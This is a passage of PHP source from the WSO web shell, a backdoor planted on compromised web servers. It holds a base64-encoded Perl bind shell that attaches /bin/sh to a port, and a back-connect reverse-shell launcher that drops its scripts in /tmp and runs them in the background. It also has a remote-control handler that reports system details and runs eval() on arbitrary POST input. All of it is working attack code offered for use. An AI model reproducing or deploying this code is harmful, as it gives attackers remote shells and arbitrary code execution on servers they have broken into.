1891$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1892echo "<h1>Network tools</h1><div class=content>
1893
1894 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1895 <span>Bind port to /bin/sh [perl]</span><br/>
1896 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1897 </form>
1898 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
1899 <span>Back-connect [perl]</span><br/>
1900 Server: <input type='text' name='server' value='".$_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1901
1902 </form><br>";
1903if(isset($_POST['p1'])) {
1904function cf($f,$t) {
1905$w = @fopen($f,"w") or @function_exists('file_put_contents');
1906if($w){
1907@fwrite($w,@base64_decode($t));
1908@fclose($w);
1909}
1910}
1911if($_POST['p1'] == 'bpp') {
1912cf("/tmp/bp.pl",$bind_port_p);
1913$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
1914echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
1915unlink("/tmp/bp.pl");
1916}
1917if($_POST['p1'] == 'bcp') {
1918cf("/tmp/bc.pl",$back_connect_p);
1919$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1920echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
1921unlink("/tmp/bc.pl");
1922}
1923}
1924echo '</div>';
1925wsoFooter();
1926}
1927function actionRC() {
1928if(!@$_POST['p1']) {
1929$a = array(
1930"uname"=>php_uname(),
1931"php_version"=>phpversion(),
1932"wso_version"=>WSO_VERSION,
1933"safemode"=>@ini_get('safe_mode')
1934);
1935echo serialize($a);
1936}else {
1937eval($_POST['p1']);
1938}
1939}
1940if( empty($_POST['a']) )
1941if(isset($default_action) &&function_exists('action'.$default_action))
1942$_POST['a'] = $default_action;
1943else
1944$_POST['a'] = 'SecInfo';
1945if( !empty($_POST['a']) &&function_exists('action'.$_POST['a']) )
1946call_user_func('action'.$_POST['a']);
1947function FetchURL($url) {
1948$ch = curl_init();
1949curl_setopt($ch,CURLOPT_USERAGENT,"$cheader");
1950curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
1951curl_setopt($ch,CURLOPT_HEADER,false);
1952curl_setopt($ch,CURLOPT_URL,$url);
1953curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1954curl_setopt($ch,CURLOPT_TIMEOUT,30);
1955$data = curl_exec($ch);
1956if(!$data) {
1957return false;
1958}
1959return $data;
1960}
1961exit; ?>